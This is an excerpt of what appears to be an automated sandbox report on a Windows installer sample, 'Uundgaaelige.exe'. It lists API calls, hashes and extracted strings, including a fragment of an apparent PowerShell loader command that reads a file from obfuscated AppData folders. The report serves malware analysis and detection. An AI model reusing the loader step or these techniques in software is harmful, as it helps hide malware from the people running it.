                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 9ad871f4f8a3338eb99fe4e61ab0dcd0b50e8b4f7c7093f405d94b725c985010
                                                  • Instruction ID: 0b9a08df0e19283e0c47f542131d218e25c17bbe1cc26e2bbd3e30b70dde81e4
                                                  • Opcode Fuzzy Hash: 9ad871f4f8a3338eb99fe4e61ab0dcd0b50e8b4f7c7093f405d94b725c985010
                                                  • Instruction Fuzzy Hash: FD01F431B202109BE7194B389D05B6A36A8E710315F51823FF951F65F1D778CC038B4C
                                                  APIs
                                                  • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 0040239C
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 004023A5
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: CloseDeleteValue
                                                  • String ID:
                                                  • API String ID: 2831762973-0
                                                  • Opcode ID: bc1685d4ae208c1d1d23a44588ade792f4c17fe15bc88d75915684a87409a1e3
                                                  • Instruction ID: 4734060bda5bcd379add1307bf53be40299433fde06acb7bb12a187abd2f1290
                                                  • Opcode Fuzzy Hash: bc1685d4ae208c1d1d23a44588ade792f4c17fe15bc88d75915684a87409a1e3
                                                  • Instruction Fuzzy Hash: 6CF09632B04111ABD710AFB89B8EABE76A89B80354F25003FEA05B71C1DAFC4D02476D
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 004052A2
                                                    • Part of subcall function 004041A6: SendMessageA.USER32(00010408,00000000,00000000,00000000), ref: 004041B8
                                                  • OleUninitialize.OLE32(00000404,00000000), ref: 004052EE
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeMessageSendUninitialize
                                                  • String ID:
                                                  • API String ID: 2896919175-0
                                                  • Opcode ID: bd9a5ddb8951e702f593d935893cbe0c9e9a33ea4b989c347e82015d2b76b38a
                                                  • Instruction ID: 87a8d658111fd0208c3f238e633952134940df41e2ee6bc8381daed66fdac0ea
                                                  • Opcode Fuzzy Hash: bd9a5ddb8951e702f593d935893cbe0c9e9a33ea4b989c347e82015d2b76b38a
                                                  • Instruction Fuzzy Hash: 22F02EB26006028BE7616780EE00B1773A0EFD0700F6A407FEE94B62F0C77808428E6C
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?,?,?,00403380,0000000A), ref: 00406443
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0040645E
                                                    • Part of subcall function 004063C3: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004063DA
                                                    • Part of subcall function 004063C3: wsprintfA.USER32 ref: 00406413
                                                    • Part of subcall function 004063C3: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406427
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                  • String ID:
                                                  • API String ID: 2547128583-0
                                                  • Opcode ID: 0ad4aa8648104e950424ecb2e9ed5d31610cefc4b667c124e82fedf243554202
                                                  • Instruction ID: 56fda94a1dd54a43fb122a1991fe363568279dfba8e98efda579274c3b941564
                                                  • Opcode Fuzzy Hash: 0ad4aa8648104e950424ecb2e9ed5d31610cefc4b667c124e82fedf243554202
                                                  • Instruction Fuzzy Hash: E3E086326042105AD2106BB09E0487773A89F84750302883EF946F2140D7389C75ABAE
                                                  APIs
                                                  • GetFileAttributesA.KERNELBASE(00000003,00402DDB,C:\Users\user\Desktop\Uundgaaelige.exe,80000000,00000003), ref: 00405C36
                                                  • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C58
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
                                                  • Opcode ID: a0ef3aabf8739962215ab3b029b3a8460f23d0e56d3659f47e9d959f4e092221
                                                  • Instruction ID: 44ec1511c7d75563636feacf23b0872b92cf9f9cc06fc18b7ec6e669f43cef59
                                                  • Opcode Fuzzy Hash: a0ef3aabf8739962215ab3b029b3a8460f23d0e56d3659f47e9d959f4e092221
                                                  • Instruction Fuzzy Hash: E4D09E71654201AFEF098F20DE16F2EBAA2EB84B00F11952CB682944E1DA715819AB19
                                                  APIs
                                                  • GetFileAttributesA.KERNELBASE(?,?,00405825,?,?,00000000,00405A08,?,?,?,?), ref: 00405C12
                                                  • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405C26
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: d21186c4df97c8b90cedd4d9d2ae0fe59d501b3437fd2b8c2b63dc03c6f7d79a
                                                  • Instruction ID: 434021fb132f1a115613134526c1ca1f9a267fea60db19119bc25123d282abd2
                                                  • Opcode Fuzzy Hash: d21186c4df97c8b90cedd4d9d2ae0fe59d501b3437fd2b8c2b63dc03c6f7d79a
                                                  • Instruction Fuzzy Hash: 6FD0C972504121BBD2102728EE0889FBB55DB54271702CA35F8A9A26B1DB304C5A9A98
                                                  APIs
                                                  • CreateDirectoryA.KERNELBASE(?,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 00405709
                                                  • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405717
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID:
                                                  • API String ID: 1375471231-0
                                                  APIs
                                                  • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402B72,00000000,?,?), ref: 00405F76
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  APIs
                                                  • WriteFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,00411C83,0040B8D8,00403246,0040B8D8,00411C83,004138D8,00004000,?,00000000,00403070,00000004), ref: 00405CED
                                                  Similarity
                                                  • API ID: FileWrite
                                                  • String ID:
                                                  • API String ID: 3934441357-0
                                                  APIs
                                                  • ReadFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,004138D8,0040B8D8,004032C2,0040A130,0040A130,004031C6,004138D8,00004000,?,00000000,00403070), ref: 00405CBE
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405FAD,?,?,?,?,00000002,: Completed), ref: 00405F43
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  APIs
                                                  • SendMessageA.USER32(00010408,00000000,00000000,00000000), ref: 004041B8
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FC3,?), ref: 004032D3
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  APIs
                                                  • SendMessageA.USER32(00000028,?,00000001,00403FBF), ref: 0040419D
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,00403F58), ref: 00404186
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  APIs
                                                  • Sleep.KERNELBASE(00000000), ref: 004014E9
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404B55
                                                  • GetDlgItem.USER32(?,00000408), ref: 00404B60
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BAA
                                                  • LoadBitmapA.USER32(0000006E), ref: 00404BBD
                                                  • SetWindowLongA.USER32(?,000000FC,00405134), ref: 00404BD6
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BEA
                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BFC
                                                  • SendMessageA.USER32(?,00001109,00000002), ref: 00404C12
                                                  • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C1E
                                                  • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C30
                                                  • DeleteObject.GDI32(00000000), ref: 00404C33
                                                  • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404C5E
                                                  • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404C6A
                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404CFF
                                                  • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404D2A
                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D3E
                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00404D6D
                                                  • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404D7B
                                                  • ShowWindow.USER32(?,00000005), ref: 00404D8C
                                                  • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404E89
                                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404EEE
                                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F03
                                                  • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F27
                                                  • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F47
                                                  • ImageList_Destroy.COMCTL32(00000000), ref: 00404F5C
                                                  • GlobalFree.KERNEL32(00000000), ref: 00404F6C
                                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404FE5
                                                  • SendMessageA.USER32(?,00001102,?,?), ref: 0040508E
                                                  • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 0040509D
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004050BD
                                                  • ShowWindow.USER32(?,00000000), ref: 0040510B
                                                  • GetDlgItem.USER32(?,000003FE), ref: 00405116
                                                  • ShowWindow.USER32(00000000), ref: 0040511D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N$l8h
                                                  • API String ID: 1638840714-2106396844
                                                  • Opcode ID: 21234ef24cb517e62b6e681d72db919925f617bec669e1fe45a086f5b61beedf
                                                  • Instruction ID: d82d2da19de6c08df5f7af85b096481c441aefc445292f149536e1611d4f21ae
                                                  • Opcode Fuzzy Hash: 21234ef24cb517e62b6e681d72db919925f617bec669e1fe45a086f5b61beedf
                                                  • Instruction Fuzzy Hash: 080241B0A00209AFDB209F95DD85AAE7BB5FB84314F10417AF611BA2E1C7799D42CF58
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404619
                                                  • SetWindowTextA.USER32(00000000,?), ref: 00404643
                                                  • SHBrowseForFolderA.SHELL32(?,00420108,?), ref: 004046F4
                                                  • CoTaskMemFree.OLE32(00000000), ref: 004046FF
                                                  • lstrcmpiA.KERNEL32(: Completed,shaharit Setup: Completed), ref: 00404731
                                                  • lstrcatA.KERNEL32(?,: Completed), ref: 0040473D
                                                  • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040474F
                                                    • Part of subcall function 00405799: GetDlgItemTextA.USER32(?,?,00000400,00404786), ref: 004057AC
                                                    • Part of subcall function 00406303: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Uundgaaelige.exe",77273410,C:\Users\user\AppData\Local\Temp\,00000000,004032E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 0040635B
                                                    • Part of subcall function 00406303: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406368
                                                    • Part of subcall function 00406303: CharNextA.USER32(?,"C:\Users\user\Desktop\Uundgaaelige.exe",77273410,C:\Users\user\AppData\Local\Temp\,00000000,004032E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 0040636D
                                                    • Part of subcall function 00406303: CharPrevA.USER32(?,?,77273410,C:\Users\user\AppData\Local\Temp\,00000000,004032E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 0040637D
                                                  • GetDiskFreeSpaceA.KERNEL32(0041FD00,?,?,0000040F,?,0041FD00,0041FD00,?,00000001,0041FD00,?,?,000003FB,?), ref: 0040480D
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404828
                                                    • Part of subcall function 00404981: lstrlenA.KERNEL32(shaharit Setup: Completed,shaharit Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,0040489C,000000DF,00000000,00000400,?), ref: 00404A1F
                                                    • Part of subcall function 00404981: wsprintfA.USER32 ref: 00404A27
                                                    • Part of subcall function 00404981: SetDlgItemTextA.USER32(?,shaharit Setup: Completed), ref: 00404A3A
                                                  Strings
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: "$Acrasiales=Get-Content 'C:\Users\user\AppData\Roaming\raffineredes\cerous\Chugging\Dialektologi.Alt$: Completed$A$C:\Users\user\AppData\Roaming\raffineredes\cerous$l8h$shaharit Setup: Completed
                                                  • API String ID: 2624150263-3080919986
                                                  • Opcode ID: 76c1ef681dfc1789dea454b52c729533340df3c35bc87fe95344eb3cb4d70c23
                                                  • Instruction ID: 615b1c7bc5a39f2962dd47e2389a1e1cc3dfb76fea7d39b1cb42eedec06edaaa
                                                  • Opcode Fuzzy Hash: 76c1ef681dfc1789dea454b52c729533340df3c35bc87fe95344eb3cb4d70c23
                                                  • Instruction Fuzzy Hash: E4A19FB1900209ABDB11EFA5CC85AAFB7B8EF85314F10843BF611B62D1D77C89418B69
                                                  APIs
                                                  • CoCreateInstance.OLE32(00408408,?,00000001,004083F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040214D
                                                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004083F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021FC
                                                  Strings
                                                  • C:\Users\user\AppData\Roaming\raffineredes\cerous\Feltrkkeflgerne, xrefs: 0040218D
                                                  Similarity
                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                  • String ID: C:\Users\user\AppData\Roaming\raffineredes\cerous\Feltrkkeflgerne
                                                  • API String ID: 123533781-3937776109
                                                  • Opcode ID: 6635f594b61ce934d192a6d41804f9d6b5f4078cf2f1b58ccc5d727e59ea5b13
                                                  • Instruction ID: a4a7f3c5621d46c7608b395b9069b641d7403675325c7ae40bb0e4cab6624151
                                                  • Opcode Fuzzy Hash: 6635f594b61ce934d192a6d41804f9d6b5f4078cf2f1b58ccc5d727e59ea5b13
                                                  • Instruction Fuzzy Hash: 89512475A00208BFCF10DFE4C988A9DBBB5EF88314F2045AAF915EB2D1DA799941CF54
                                                  APIs
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402707
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID:
                                                  • API String ID: 1974802433-0
                                                  • Opcode ID: 6e256eea41c4bf556cba901839b7f4fb64acae9e66e34b9222a974add78538a2
                                                  • Instruction ID: 0159b05a81fb7445ac67952f267e1ed3d95360429fb03f1bd53dceef05a54f2a
                                                  • Opcode Fuzzy Hash: 6e256eea41c4bf556cba901839b7f4fb64acae9e66e34b9222a974add78538a2
                                                  • Instruction Fuzzy Hash: EEF055727041019BC300EBB49948AEEB768DF21324F20017FE285F20C1C7B889469B3A
                                                  APIs
                                                  • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040432E
                                                  • GetDlgItem.USER32(00000000,000003E8), ref: 00404342
                                                  • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404360
                                                  • GetSysColor.USER32(?), ref: 00404371
                                                  • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404380
                                                  • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040438F
                                                  • lstrlenA.KERNEL32(?), ref: 00404392
                                                  • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043A1
                                                  • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043B6
                                                  • GetDlgItem.USER32(?,0000040A), ref: 00404418
                                                  • SendMessageA.USER32(00000000), ref: 0040441B
                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404446
                                                  • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404486
                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 00404495
                                                  • SetCursor.USER32(00000000), ref: 0040449E
                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 004044B4
                                                  • SetCursor.USER32(00000000), ref: 004044B7
                                                  • SendMessageA.USER32(00000111,00000001,00000000), ref: 004044E3
                                                  • SendMessageA.USER32(00000010,00000000,00000000), ref: 004044F7
                                                  Strings
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                  • String ID: : Completed$N$l8h$nB@
                                                  • API String ID: 3103080414-3676058858
                                                  • Opcode ID: be1686f5ab50b662bbe0d02e149cf8afdcfbb49c1a0c534bd92e439938163a57
                                                  • Instruction ID: d5db58c66581f694922deb7e8fae8f0f3f349f8e9ef4465256bb12a48e84c332
                                                  • Opcode Fuzzy Hash: be1686f5ab50b662bbe0d02e149cf8afdcfbb49c1a0c534bd92e439938163a57
                                                  • Instruction Fuzzy Hash: 0E61A4B1A40209BFDB109F61DD45F6A7B69FB84714F10803AFB05BA2D1C7B8A951CF98
                                                  APIs
                                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextA.USER32(00000000,00423F20,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: F
                                                  • API String ID: 941294808-1304234792
                                                  • Opcode ID: bdf52cc5ae8694a0bdbebf00984b2734c5f81ee4e26e9c894a20d3f53608c02a
                                                  • Instruction ID: efe066deb40a78245321151b9dab29af26a41e73ee4a669cec0cc25ab5e9cd35
                                                  • Opcode Fuzzy Hash: bdf52cc5ae8694a0bdbebf00984b2734c5f81ee4e26e9c894a20d3f53608c02a
                                                  • Instruction Fuzzy Hash: 89418C71800209AFCF058F95DE459AFBBB9FF45315F00802EF5A1AA1A0CB389A55DFA4
                                                  APIs
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405E99,?,?), ref: 00405D39
                                                  • GetShortPathNameA.KERNEL32(?,00422AC0,00000400), ref: 00405D42
                                                    • Part of subcall function 00405B97: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405DF2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BA7
                                                    • Part of subcall function 00405B97: lstrlenA.KERNEL32(00000000,?,00000000,00405DF2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD9
                                                  • GetShortPathNameA.KERNEL32(?,00422EC0,00000400), ref: 00405D5F
                                                  • wsprintfA.USER32 ref: 00405D7D
                                                  • GetFileSize.KERNEL32(00000000,00000000,00422EC0,C0000000,00000004,00422EC0,?,?,?,?,?), ref: 00405DB8
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405DC7
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DFF
                                                  • SetFilePointer.KERNEL32(0040A3D0,00000000,00000000,00000000,00000000,004226C0,00000000,-0000000A,0040A3D0,00000000,[Rename],00000000,00000000,00000000), ref: 00405E55
                                                  • GlobalFree.KERNEL32(00000000), ref: 00405E66
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405E6D
                                                    • Part of subcall function 00405C32: GetFileAttributesA.KERNELBASE(00000003,00402DDB,C:\Users\user\Desktop\Uundgaaelige.exe,80000000,00000003), ref: 00405C36
                                                    • Part of subcall function 00405C32: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C58
                                                  Strings
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                  • String ID: %s=%s$[Rename]
                                                  • API String ID: 2171350718-1727408572
                                                  • Opcode ID: f38d8d20ea3c52f409b1efdd4663a8df0a06a90a62bb981f7671b6e2d5e9100d
                                                  • Instruction ID: d3b28aaf25f2f1dce52cf372ecf52c774524a9466fe584fbe8e796e5af075e1b
                                                  • Opcode Fuzzy Hash: f38d8d20ea3c52f409b1efdd4663a8df0a06a90a62bb981f7671b6e2d5e9100d
                                                  • Instruction Fuzzy Hash: 97312331200B19BBC2206B61EE49F2B3A5CDF85754F14043AF985F62D2DB7CA9018ABD
                                                  APIs
                                                  • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Uundgaaelige.exe",77273410,C:\Users\user\AppData\Local\Temp\,00000000,004032E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 0040635B
                                                  • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406368
                                                  • CharNextA.USER32(?,"C:\Users\user\Desktop\Uundgaaelige.exe",77273410,C:\Users\user\AppData\Local\Temp\,00000000,004032E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 0040636D
                                                  • CharPrevA.USER32(?,?,77273410,C:\Users\user\AppData\Local\Temp\,00000000,004032E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 0040637D
                                                  Strings
                                                  • *?|<>/":, xrefs: 0040634B
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00406304
                                                  • "C:\Users\user\Desktop\Uundgaaelige.exe", xrefs: 0040633F
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: "C:\Users\user\Desktop\Uundgaaelige.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 589700163-2722285368
                                                  APIs
                                                  • GetWindowLongA.USER32(?,000000EB), ref: 004041DE
                                                  • GetSysColor.USER32(00000000), ref: 004041FA
                                                  • SetTextColor.GDI32(?,00000000), ref: 00404206
                                                  • SetBkMode.GDI32(?,?), ref: 00404212
                                                  • GetSysColor.USER32(?), ref: 00404225
                                                  • SetBkColor.GDI32(?,?), ref: 00404235
                                                  • DeleteObject.GDI32(?), ref: 0040424F
                                                  • CreateBrushIndirect.GDI32(?), ref: 00404259
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  APIs
                                                  • DestroyWindow.USER32(00000000,00000000), ref: 00402D11
                                                  • GetTickCount.KERNEL32 ref: 00402D2F
                                                  • wsprintfA.USER32 ref: 00402D5D
                                                    • Part of subcall function 004051C0: lstrlenA.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000,?), ref: 004051F9
                                                    • Part of subcall function 004051C0: lstrlenA.KERNEL32(00402D70,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000), ref: 00405209
                                                    • Part of subcall function 004051C0: lstrcatA.KERNEL32(Completed,00402D70,00402D70,Completed,00000000,00000000,00000000), ref: 0040521C
                                                    • Part of subcall function 004051C0: SetWindowTextA.USER32(Completed,Completed), ref: 0040522E
                                                    • Part of subcall function 004051C0: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405254
                                                    • Part of subcall function 004051C0: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040526E
